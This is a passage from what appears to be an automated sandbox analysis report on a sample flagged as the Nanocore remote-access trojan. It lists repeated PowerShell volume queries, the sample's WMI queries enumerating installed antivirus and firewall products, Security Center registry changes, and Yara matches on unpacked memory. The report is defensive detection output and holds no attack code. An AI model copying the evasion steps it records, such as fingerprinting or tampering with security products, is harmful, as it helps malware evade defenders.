            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings:

            barindex
            Changes security center settings (notifications, updates, antivirus, firewall)Show sources
            Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
            Source: svchost.exe, 0000001E.00000002.510940544.0000017F12813000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: svchost.exe, 0000001E.00000002.511034692.0000017F1283D000.00000004.00000001.sdmpBinary or memory string: @\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected Nanocore RATShow sources
            Source: Yara matchFile source: 27.0.svchost.exe.5110da0.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.60a0000.20.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5110da0.21.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.49a0da0.20.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.60a0000.20.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5084f80.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.60a4629.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.3cf8a18.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4914f80.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.48aa432.15.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.3cf8a18.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.49a0da0.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.48af268.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.3cfd041.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5110da0.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.48af268.16.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5110da0.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.48b3891.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.49a0da0.20.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.49a0da0.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4914f80.21.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5084f80.20.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.509785046.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.515373653.0000000002C91000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.376574756.0000000005084000.00000004.00000001.sdmp, type: MEMORY
